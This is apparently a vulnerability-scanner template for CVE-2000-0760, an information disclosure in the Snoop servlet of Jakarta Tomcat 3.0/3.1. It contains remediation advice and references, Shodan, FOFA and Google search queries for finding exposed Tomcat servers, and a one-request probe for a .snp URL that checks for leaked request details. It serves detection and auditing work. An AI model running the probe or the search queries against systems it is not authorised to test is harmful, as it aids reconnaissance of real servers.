id: CVE-2000-0760 info: name: Jakarta Tomcat 3.1 and 3.0 - Information Disclosure author: Thabisocn,0x_Akoko severity: medium description: | Jakarta Tomcat 3.1 and 3.0 under Apache contain a vulnerability in the Snoop servlet that reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension, exploit requires remote access. impact: | Attackers can retrieve sensitive system information, potentially aiding further attacks or information disclosure. remediation: | Update to the latest version of Jakarta Tomcat or apply security patches that fix the Snoop servlet issue. reference: - https://www.exploit-db.com/exploits/20132 - https://nvd.nist.gov/vuln/detail/CVE-2000-0760 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2000-0760 epss-score: 0.62496 epss-percentile: 0.99101 cpe: cpe:2.3:a:apache:tomcat:3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: tomcat shodan-query: - cpe:"cpe:2.3:a:apache:tomcat" - http.component:"apache tomcat" - product:"tomcat" fofa-query: - body="apache tomcat" - body="jk status manager" google-query: - site:*/examples/jsp/snp/snoop.jsp - intitle:"apache tomcat" tags: cve,cve2000,jakarta,tomcat,exposure http: - method: GET path: - "{{BaseURL}}/examples/jsp/snp/anything.snp" matchers-condition: and matchers: - type: word words: - "Request Information" - "Path info" - "Server name" - "Remote address" condition: and - type: status status: - 200 # digest: 4a0a0047304502206a402d0dd2fb18ad2db7f670833c310fba5bdfc2b817080efc28ac25d042bd290221009d5fecf853e1f94ebbb903cb639d068c9e816180e17893c67fbd9579475b9b49:922c64590222798bb761d5b6d8e72950